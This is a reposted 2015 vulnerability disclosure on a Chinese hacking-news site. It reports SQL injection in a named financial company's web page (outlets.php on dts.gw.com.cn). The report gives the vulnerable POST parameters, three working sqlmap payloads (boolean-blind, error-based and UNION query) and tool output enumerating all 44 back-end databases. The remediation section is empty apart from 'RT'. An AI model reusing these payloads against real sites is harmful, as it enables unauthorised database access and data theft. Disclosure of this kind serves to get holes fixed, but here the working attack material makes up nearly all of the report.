记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

大智慧某站存在SQL注入涉及44个库

2015-04-07 10:50

问题处:http://dts.gw.com.cn/outlets.php



POST下

code 区域
area_selet1=0&area_selet2=0





两个参数都存在注入

漏洞证明:

code 区域
Place: POST

Parameter: area_selet1

Type: boolean-based blind

Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus

e (RLIKE)

Payload: area_selet1=0' RLIKE IF(1889=1889,0,0x28) AND 'ajCw'='ajCw&area_sel

et2=0



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: area_selet1=0' AND (SELECT 4202 FROM(SELECT COUNT(*),CONCAT(0x3a716

f783a,(SELECT (CASE WHEN (4202=4202) THEN 1 ELSE 0 END)),0x3a6d75683a,FLOOR(RAND

(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tjfe'='tjfe&a

rea_selet2=0



Type: UNION query

Title: MySQL UNION query (NULL) - 5 columns

Payload: area_selet1=0' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x3a716f783a,

0x476a594b666459495448,0x3a6d75683a),NULL#&area_selet2=0

---

[09:21:49] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.3, Nginx

back-end DBMS: MySQL 5.0

[09:21:49] [INFO] fetching database names

available databases [44]:

[*] dzh_13file

[*] dzh_20141212

[*] dzh_365cj

[*] dzh_365tuangou

[*] dzh_agds

[*] dzh_billboardhot

[*] dzh_cgds

[*] dzh_cldsy

[*] dzh_cpgm

[*] dzh_dati

[*] dzh_dhhy

[*] dzh_dts

[*] dzh_dtsgathering

[*] dzh_fxs

[*] dzh_gddyj

[*] dzh_gjb

[*] dzh_gold230

[*] dzh_gw_times

[*] dzh_gxycp

[*] dzh_hd_roger

[*] dzh_hd_sj

[*] dzh_hd_sjs

[*] dzh_hd_zk

[*] dzh_investor

[*] dzh_msyl

[*] dzh_peixun

[*] dzh_pxck

[*] dzh_tg

[*] dzh_tmall

[*] dzh_tongye

[*] dzh_tuan_new

[*] dzh_tybaobiao

[*] dzh_ycpcj

[*] dzhsp

[*] gtry

[*] gtry2

[*] hjt

[*] information_schema

[*] mysql

[*] ttxs

[*] ttxsback

[*] wapycp

[*] worldcup2014

[*] zhihuiri_20140519

修复方案:

RT

知识来源: www.wooyun.org/bugs/wooyun-2015-0106147

阅读:71157 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“大智慧某站存在SQL注入涉及44个库”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云